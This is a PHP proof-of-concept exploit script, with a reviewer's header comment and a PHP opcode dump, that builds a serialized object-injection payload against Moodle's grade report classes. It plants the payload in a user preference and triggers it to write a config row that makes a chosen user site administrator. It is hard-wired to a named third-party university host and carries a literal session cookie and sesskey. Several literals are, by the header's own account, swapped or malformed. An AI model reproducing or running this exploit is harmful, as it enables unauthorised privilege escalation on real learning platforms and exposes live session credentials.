<?php
/*
 * NOTE(review): this file is a proof-of-concept exploit script, not application code.
 *
 * What it does, going by its own comments and the calls below: it serialize()s an
 * array holding a gradereport_overview_external wrapper plus a
 * gradereport_singleview\local\ui\feedback object whose nested grade_item carries a
 * table name, a row id and one column/value pair; it stores that string into the
 * 'course_overview_course_order' user preference via the
 * core_user_update_user_preferences AJAX service; and it then requests a page so
 * that the legacy course_overview block reads the preference back.  The premise of
 * the script is that the target hands that string to unserialize() and that the
 * feedback object's inherited __toString() turns the grade_item fields into a row
 * update on the target's database (here: the 'config' table).
 *
 * The empty classes declared below are stand-ins only: they exist so serialize()
 * emits the right class names.  Nothing here runs against real Moodle classes;
 * the target's autoloader supplies those.
 *
 * Review findings (no code changed in this pass):
 *  - The script is hard-wired to a third-party host with a literal session cookie
 *    and sesskey.  Running it without the site owner's explicit authorization is
 *    unlawful, and credentials must never be committed in source either way.
 *  - Both HTTP helpers route every request through 127.0.0.1:8080 although the
 *    adjacent comment says the proxy line is meant to be commented out.  The
 *    return value of curl_exec() is never checked, so a missing proxy or any other
 *    transport error fails silently and the script carries on.
 *  - The final GET in update_table() concatenates an absolute URL onto $url,
 *    producing a malformed request; as written that call cannot fetch the page
 *    the comment says it is meant to.
 *  - $column holds the numeric string '92558' while its comment says "column
 *    name", and $value is 3 while its comment says "userid" – the two literals
 *    look swapped relative to their comments.  Left as-is; this is a
 *    target-specific copy, not a reference implementation.
 *  - $rowId = 375 is assigned but its only consumer is commented out.
 *  - The site is addressed over plain http://, so the session cookie crosses the
 *    network in clear text on every request.
 *
 * Defensive takeaway: never unserialize() user-controlled data, user preferences
 * included; store structured preferences as JSON and validate on read.  This
 * vulnerability class is publicly disclosed and fixed in supported Moodle
 * releases – check the vendor advisory for the exact fixed versions.
 */
namespace gradereport_singleview\local\ui {
    // Stand-in for the real Moodle class of the same name.  The exploit relies on
    // the parent's __toString() on the TARGET, not on anything defined here.
    class feedback{ }
}

namespace {
    // Further stand-ins so serialize() can emit these class names locally.
    class gradereport_overview_external{ }
    class grade_item{ }
    class grade_grade{ }

    /**
     * Minimal POST helper built on php-curl.
     *
     * @param string       $url           absolute URL to post to
     * @param array|string $data          form fields (array) when $json is falsy,
     *                                    otherwise a raw request body sent as-is
     * @param string       $MoodleSession value of the MoodleSession cookie to send
     * @param int|bool     $json          truthy: add a JSON content type and leave
     *                                    $data untouched; falsy: encode $data as a
     *                                    query string
     * @return string|false response body, or false when curl fails (callers never check)
     */
    function httpPost($url, $data, $MoodleSession, $json)
    {
        $curl = curl_init($url);
        $headers = array('Cookie: MoodleSession='.$MoodleSession);
        if($json){
            array_push($headers, 'Content-Type: application/json');
        }else{
            // http_build_query() percent-encodes the brackets in keys such as
            // 'sortorder[]'; urldecode() restores them, presumably so the server
            // parses the field as an array.  It also decodes any '%' or '+' inside
            // values, so this is only safe for the plain alphanumeric values this
            // script sends.
            $data = urldecode(http_build_query($data));
        }
        curl_setopt($curl, CURLOPT_POST, true);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $data);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        // NOTE(review): this line is ACTIVE, contrary to the original comment
        // ("un-comment if you wish to use a proxy").  Every request goes via
        // 127.0.0.1:8080 (the usual port of an intercepting proxy); with nothing
        // listening there curl_exec() returns false and no one reports it.
        curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080');
        $response = curl_exec($curl);
        curl_close($curl);
        return $response;
    }

    /**
     * Minimal GET helper built on php-curl.
     *
     * @param string $url           absolute URL to fetch
     * @param string $MoodleSession value of the MoodleSession cookie to send
     * @return string|false response body, or false when curl fails (callers never check)
     */
    function httpGet($url, $MoodleSession)
    {
        $curl = curl_init($url);
        $headers = array('Cookie: MoodleSession='.$MoodleSession);
        curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        // NOTE(review): active, not optional – see the same line in httpPost().
        curl_setopt($curl, CURLOPT_PROXY, '127.0.0.1:8080');
        $response = curl_exec($curl);
        curl_close($curl);
        return $response;
    }

    /**
     * Build the object-injection payload, plant it in the session user's
     * preferences, and request a page intended to trigger it.
     *
     * @param string $url           base URL of the Moodle site
     * @param string $MoodleSession session cookie of an authenticated user
     * @param string $sesskey       that user's CSRF token ("sesskey")
     * @param string $table         database table the gadget is meant to update
     * @param int    $rowId         id of the row to update
     * @param string $column        column to set; used as a dynamic property name below
     * @param mixed  $value         value to write.  NOTE: this variable is reused
     *                              further down to hold the serialized payload.
     * @return void  responses are discarded; nothing reports success or failure
     */
    function update_table($url, $MoodleSession, $sesskey, $table, $rowId, $column, $value){
        //first we create a gradereport_overview_external object because it is supported by the
        //Moodle autoloader and it includes the grade_grade and grade_item classes that we are
        //going to need
        $base = new gradereport_overview_external();
        // now we create the feedback object which inherits the vulnerable __tostring() method from its parent
        $fb = new gradereport_singleview\local\ui\feedback();
        //filling the feedback object with the required properties for the exploit to work
        $fb -> grade = new grade_grade();
        $fb -> grade -> grade_item = new grade_item();
        $fb -> grade -> grade_item -> calculation = "[[somestring";
        $fb -> grade -> grade_item -> calculation_normalized = false;
        //setting the table which we want to alter
        $fb -> grade -> grade_item -> table = $table;
        //setting the row id of the row that we want to alter
        $fb -> grade -> grade_item -> id = $rowId;
        //setting the column with the value that we want to insert
        // (dynamic property: the property literally named by $column is assigned,
        // and that same name is listed in required_fields alongside 'id')
        $fb -> grade -> grade_item -> $column = $value;
        $fb -> grade -> grade_item -> required_fields = array($column,'id');
        //creating the array with our base object (which itself is included in an array because
        //the base object has no __tostring() method) and our payload object
        $arr = array(array($base),$fb);
        //serializing the array  (overwrites the $value parameter from here on)
        $value = serialize($arr);
        //we'll set the course_blocks sortorder to 0 so we default to legacy user preference
        $data = array('sesskey' => $sesskey, 'sortorder[]' => 0);
        // NOTE(review): with the $url used in this script (trailing slash) every
        // concatenation below yields a '//' in the path.
        httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
        //injecting the payload: one AJAX service call that sets a single user preference
        //to the serialized string built above
        $data = json_encode(array(array(
            'index'=> 0,
            'methodname'=>'core_user_update_user_preferences',
            'args'=>array('preferences'=>array(array(
                'type'=> 'course_overview_course_order',
                'value' => $value
            )))
        )));
        httpPost($url.'/lib/ajax/service.php?sesskey='.$sesskey, $data, $MoodleSession,1);
        //getting the frontpage so the payload will activate
        // NOTE(review): an absolute URL is appended to $url here, so the request
        // goes to "<$url>http://moodle.najah.edu/user/preferences.php?userid=92558",
        // which is malformed.  As written this call does not fetch the front page
        // the comment describes.
        httpGet($url.'http://moodle.najah.edu/user/preferences.php?userid=92558', $MoodleSession);
    }

    // ---- target and credentials (hard-coded; see the header comment) ----
    $url = 'http://moodle.najah.edu/'; //url of the Moodle site (plain http, trailing slash)
    $MoodleSession = '5e69ipruqbisg7vprlcmag8606'; //your MoodleSession cookie value
    $sesskey = 'dR6co7FJPz'; //your sesskey
    $table = "config"; //table to update
    $rowId = 25; // row id to insert into. 25 is the row that sets the 'siteadmins' parameter.
                 // could vary from installation to installation
    $column = '92558'; //column name to update, which holds the userid
                       // NOTE(review): the literal is a numeric string, not a column name
    $value = 3; // userid to set as 'siteadmins' Probably want to make it your own
    update_table($url, $MoodleSession,$sesskey,$table,$rowId,$column, $value);
    //reset the allversionshash config entry with a sha1 hash so the site reloads its configuration
    $rowId = 375; // row id of 'allversionshash' parameter
                  // NOTE(review): dead assignment – the only call that uses it is commented out below
    //update_table($url, $MoodleSession,$sesskey,$table,$rowId, $column, sha1(time()));
    //reset the sortorder so we can see the front page again without the payload triggering
    $data = array('sesskey' => $sesskey, 'sortorder[]' => 1);
    httpPost($url. '/blocks/course_overview/save.php',$data, $MoodleSession,0);
    //force plugincheck so we can access admin panel
    httpGet($url.'/admin/index.php?cache=0&confirmplugincheck=1',$MoodleSession);
}
?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/VcEEh
function name:  (null)
number of ops:  33
compiled vars:  !0 = $url, !1 = $MoodleSession, !2 = $sesskey, !3 = $table, !4 = $rowId, !5 = $column, !6 = $value, !7 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   90     0  E >   ASSIGN                                                   !0, 'http%3A%2F%2Fmoodle.najah.edu%2F'
   91     1        ASSIGN                                                   !1, '5e69ipruqbisg7vprlcmag8606'
   92     2        ASSIGN                                                   !2, 'dR6co7FJPz'
   94     3        ASSIGN                                                   !3, 'config'
   95     4        ASSIGN                                                   !4, 25
   96     5        ASSIGN                                                   !5, '92558'
   97     6        ASSIGN                                                   !6, 3
   99     7        INIT_FCALL                                               'update_table'
          8        SEND_VAR                                                 !0
          9        SEND_VAR                                                 !1
         10        SEND_VAR                                                 !2
         11        SEND_VAR                                                 !3
         12        SEND_VAR                                                 !4
         13        SEND_VAR                                                 !5
         14        SEND_VAR                                                 !6
         15        DO_FCALL                                      0          
  102    16        ASSIGN                                                   !4, 375
  106    17        INIT_ARRAY                                       ~17     !2, 'sesskey'
         18        ADD_ARRAY_ELEMENT                                ~17     1, 'sortorder%5B%5D'
         19        ASSIGN                                                   !7, ~17
  107    20        INIT_FCALL                                               'httppost'
         21        CONCAT                                           ~19     !0, '%2Fblocks%2Fcourse_overview%2Fsave.php'
         22        SEND_VAL                                                 ~19
         23        SEND_VAR                                                 !7
         24        SEND_VAR                                                 !1
         25        SEND_VAL                                                 0
         26        DO_FCALL                                      0          
  110    27        INIT_FCALL                                               'httpget'
         28        CONCAT                                           ~21     !0, '%2Fadmin%2Findex.php%3Fcache%3D0%26confirmplugincheck%3D1'
         29        SEND_VAL                                                 ~21
         30        SEND_VAR                                                 !1
         31        DO_FCALL                                      0          
  113    32      > RETURN                                                   1

Function httppost:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 12, Position 2 = 17
Branch analysis from position: 12
1 jumps found. (Code = 42) Position 1 = 24
Branch analysis from position: 24
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 17
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/VcEEh
function name:  httpPost
number of ops:  63
compiled vars:  !0 = $url, !1 = $data, !2 = $MoodleSession, !3 = $json, !4 = $curl, !5 = $headers, !6 = $response
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   19     0  E >   RECV                                             !0      
          1        RECV                                             !1      
          2        RECV                                             !2      
          3        RECV                                             !3      
   21     4        INIT_FCALL_BY_NAME                                       'curl_init'
          5        SEND_VAR_EX                                              !0
          6        DO_FCALL                                      0  $7      
          7        ASSIGN                                                   !4, $7
   22     8        CONCAT                                           ~9      'Cookie%3A+MoodleSession%3D', !2
          9        INIT_ARRAY                                       ~10     ~9
         10        ASSIGN                                                   !5, ~10
   23    11      > JMPZ                                                     !3, ->17
   24    12    >   INIT_FCALL                                               'array_push'
         13        SEND_REF                                                 !5
         14        SEND_VAL                                                 'Content-Type%3A+application%2Fjson'
         15        DO_ICALL                                                 
         16      > JMP                                                      ->24
   26    17    >   INIT_FCALL                                               'urldecode'
         18        INIT_FCALL                                               'http_build_query'
         19        SEND_VAR                                                 !1
         20        DO_ICALL                                         $13     
         21        SEND_VAR                                                 $13
         22        DO_ICALL                                         $14     
         23        ASSIGN                                                   !1, $14
   28    24    >   INIT_FCALL_BY_NAME                                       'curl_setopt'
         25        SEND_VAR_EX                                              !4
         26        FETCH_CONSTANT                                   ~16     'CURLOPT_POST'
         27        SEND_VAL_EX                                              ~16
         28        SEND_VAL_EX                                              <true>
         29        DO_FCALL                                      0          
   29    30        INIT_FCALL_BY_NAME                                       'curl_setopt'
         31        SEND_VAR_EX                                              !4
         32        FETCH_CONSTANT                                   ~18     'CURLOPT_HTTPHEADER'
         33        SEND_VAL_EX                                              ~18
         34        SEND_VAR_EX                                              !5
         35        DO_FCALL                                      0          
   30    36        INIT_FCALL_BY_NAME                                       'curl_setopt'
         37        SEND_VAR_EX                                              !4
         38        FETCH_CONSTANT                                   ~20     'CURLOPT_POSTFIELDS'
         39        SEND_VAL_EX                                              ~20
         40        SEND_VAR_EX                                              !1
         41        DO_FCALL                                      0          
   31    42        INIT_FCALL_BY_NAME                                       'curl_setopt'
         43        SEND_VAR_EX                                              !4
         44        FETCH_CONSTANT                                   ~22     'CURLOPT_RETURNTRANSFER'
         45        SEND_VAL_EX                                              ~22
         46        SEND_VAL_EX                                              <true>
         47        DO_FCALL                                      0          
   32    48        INIT_FCALL_BY_NAME                                       'curl_setopt'
         49        SEND_VAR_EX                                              !4
         50        FETCH_CONSTANT                                   ~24     'CURLOPT_PROXY'
         51        SEND_VAL_EX                                              ~24
         52        SEND_VAL_EX                                              '127.0.0.1%3A8080'
         53        DO_FCALL                                      0          
   33    54        INIT_FCALL_BY_NAME                                       'curl_exec'
         55        SEND_VAR_EX                                              !4
         56        DO_FCALL                                      0  $26     
         57        ASSIGN                                                   !6, $26
   34    58        INIT_FCALL_BY_NAME                                       'curl_close'
         59        SEND_VAR_EX                                              !4
         60        DO_FCALL                                      0          
   35    61      > RETURN                                                   !6
   36    62*     > RETURN                                                   null

End of function httppost

Function httpget:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/VcEEh
function name:  httpGet
number of ops:  36
compiled vars:  !0 = $url, !1 = $MoodleSession, !2 = $curl, !3 = $headers, !4 = $response
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   39     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   41     2        INIT_FCALL_BY_NAME                                       'curl_init'
          3        SEND_VAR_EX                                              !0
          4        DO_FCALL                                      0  $5      
          5        ASSIGN                                                   !2, $5
   42     6        CONCAT                                           ~7      'Cookie%3A+MoodleSession%3D', !1
          7        INIT_ARRAY                                       ~8      ~7
          8        ASSIGN                                                   !3, ~8
   43     9        INIT_FCALL_BY_NAME                                       'curl_setopt'
         10        SEND_VAR_EX                                              !2
         11        FETCH_CONSTANT                                   ~10     'CURLOPT_HTTPHEADER'
         12        SEND_VAL_EX                                              ~10
         13        SEND_VAR_EX                                              !3
         14        DO_FCALL                                      0          
   44    15        INIT_FCALL_BY_NAME                                       'curl_setopt'
         16        SEND_VAR_EX                                              !2
         17        FETCH_CONSTANT                                   ~12     'CURLOPT_RETURNTRANSFER'
         18        SEND_VAL_EX                                              ~12
         19        SEND_VAL_EX                                              <true>
         20        DO_FCALL                                      0          
   45    21        INIT_FCALL_BY_NAME                                       'curl_setopt'
         22        SEND_VAR_EX                                              !2
         23        FETCH_CONSTANT                                   ~14     'CURLOPT_PROXY'
         24        SEND_VAL_EX                                              ~14
         25        SEND_VAL_EX                                              '127.0.0.1%3A8080'
         26        DO_FCALL                                      0          
   46    27        INIT_FCALL_BY_NAME                                       'curl_exec'
         28        SEND_VAR_EX                                              !2
         29        DO_FCALL                                      0  $16     
         30        ASSIGN                                                   !4, $16
   47    31        INIT_FCALL_BY_NAME                                       'curl_close'
         32        SEND_VAR_EX                                              !2
         33        DO_FCALL                                      0          
   48    34      > RETURN                                                   !4
   49    35*     > RETURN                                                   null

End of function httpget

Function update_table:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/VcEEh
function name:  update_table
number of ops:  92
compiled vars:  !0 = $url, !1 = $MoodleSession, !2 = $sesskey, !3 = $table, !4 = $rowId, !5 = $column, !6 = $value, !7 = $base, !8 = $fb, !9 = $arr, !10 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   51     0  E >   RECV                                             !0      
          1        RECV                                             !1      
          2        RECV                                             !2      
          3        RECV                                             !3      
          4        RECV                                             !4      
          5        RECV                                             !5      
          6        RECV                                             !6      
   53     7        NEW                                              $11     'gradereport_overview_external'
          8        DO_FCALL                                      0          
          9        ASSIGN                                                   !7, $11
   56    10        NEW                                              $14     'gradereport_singleview%5Clocal%5Cui%5Cfeedback'
         11        DO_FCALL                                      0          
         12        ASSIGN                                                   !8, $14
   59    13        NEW                                              $18     'grade_grade'
         14        DO_FCALL                                      0          
         15        ASSIGN_OBJ                                               !8, 'grade'
         16        OP_DATA                                                  $18
   60    17        NEW                                              $22     'grade_item'
         18        DO_FCALL                                      0          
         19        FETCH_OBJ_W                                      $20     !8, 'grade'
         20        ASSIGN_OBJ                                               $20, 'grade_item'
         21        OP_DATA                                                  $22
   61    22        FETCH_OBJ_W                                      $24     !8, 'grade'
         23        FETCH_OBJ_W                                      $25     $24, 'grade_item'
         24        ASSIGN_OBJ                                               $25, 'calculation'
         25        OP_DATA                                                  '%5B%5Bsomestring'
   62    26        FETCH_OBJ_W                                      $27     !8, 'grade'
         27        FETCH_OBJ_W                                      $28     $27, 'grade_item'
         28        ASSIGN_OBJ                                               $28, 'calculation_normalized'
         29        OP_DATA                                                  <false>
   65    30        FETCH_OBJ_W                                      $30     !8, 'grade'
         31        FETCH_OBJ_W                                      $31     $30, 'grade_item'
         32        ASSIGN_OBJ                                               $31, 'table'
         33        OP_DATA                                                  !3
   67    34        FETCH_OBJ_W                                      $33     !8, 'grade'
         35        FETCH_OBJ_W                                      $34     $33, 'grade_item'
         36        ASSIGN_OBJ                                               $34, 'id'
         37        OP_DATA                                                  !4
   69    38        FETCH_OBJ_W                                      $36     !8, 'grade'
         39        FETCH_OBJ_W                                      $37     $36, 'grade_item'
         40        ASSIGN_OBJ                                               $37, !5
         41        OP_DATA                                                  !6
   70    42        INIT_ARRAY                                       ~42     !5
         43        ADD_ARRAY_ELEMENT                                ~42     'id'
         44        FETCH_OBJ_W                                      $39     !8, 'grade'
         45        FETCH_OBJ_W                                      $40     $39, 'grade_item'
         46        ASSIGN_OBJ                                               $40, 'required_fields'
         47        OP_DATA                                                  ~42
   73    48        INIT_ARRAY                                       ~43     !7
         49        INIT_ARRAY                                       ~44     ~43
         50        ADD_ARRAY_ELEMENT                                ~44     !8
         51        ASSIGN                                                   !9, ~44
   76    52        INIT_FCALL                                               'serialize'
         53        SEND_VAR                                                 !9
         54        DO_ICALL                                         $46     
         55        ASSIGN                                                   !6, $46
   79    56        INIT_ARRAY                                       ~48     !2, 'sesskey'
         57        ADD_ARRAY_ELEMENT                                ~48     0, 'sortorder%5B%5D'
         58        ASSIGN                                                   !10, ~48
   80    59        INIT_FCALL                                               'httppost'
         60        CONCAT                                           ~50     !0, '%2Fblocks%2Fcourse_overview%2Fsave.php'
         61        SEND_VAL                                                 ~50
         62        SEND_VAR                                                 !10
         63        SEND_VAR                                                 !1
         64        SEND_VAL                                                 0
         65        DO_FCALL                                      0          
   83    66        INIT_FCALL                                               'json_encode'
         67        INIT_ARRAY                                       ~52     0, 'index'
         68        ADD_ARRAY_ELEMENT                                ~52     'core_user_update_user_preferences', 'methodname'
         69        INIT_ARRAY                                       ~53     'course_overview_course_order', 'type'
         70        ADD_ARRAY_ELEMENT                                ~53     !6, 'value'
         71        INIT_ARRAY                                       ~54     ~53
         72        INIT_ARRAY                                       ~55     ~54, 'preferences'
         73        ADD_ARRAY_ELEMENT                                ~52     ~55, 'args'
         74        INIT_ARRAY                                       ~56     ~52
         75        SEND_VAL                                                 ~56
         76        DO_ICALL                                         $57     
         77        ASSIGN                                                   !10, $57
   84    78        INIT_FCALL                                               'httppost'
         79        CONCAT                                           ~59     !0, '%2Flib%2Fajax%2Fservice.php%3Fsesskey%3D'
         80        CONCAT                                           ~60     ~59, !2
         81        SEND_VAL                                                 ~60
         82        SEND_VAR                                                 !10
         83        SEND_VAR                                                 !1
         84        SEND_VAL                                                 1
         85        DO_FCALL                                      0          
   87    86        INIT_FCALL                                               'httpget'
         87        CONCAT                                           ~62     !0, 'http%3A%2F%2Fmoodle.najah.edu%2Fuser%2Fpreferences.php%3Fuserid%3D92558'
         88        SEND_VAL                                                 ~62
         89        SEND_VAR                                                 !1
         90        DO_FCALL                                      0          
   88    91      > RETURN                                                   null

End of function update_table

Class gradereport_singleview\local\ui\feedback: [no user functions]
Class gradereport_overview_external: [no user functions]
Class grade_item: [no user functions]
Class grade_grade: [no user functions]

Generated using Vulcan Logic Dumper, using php 8.0.0

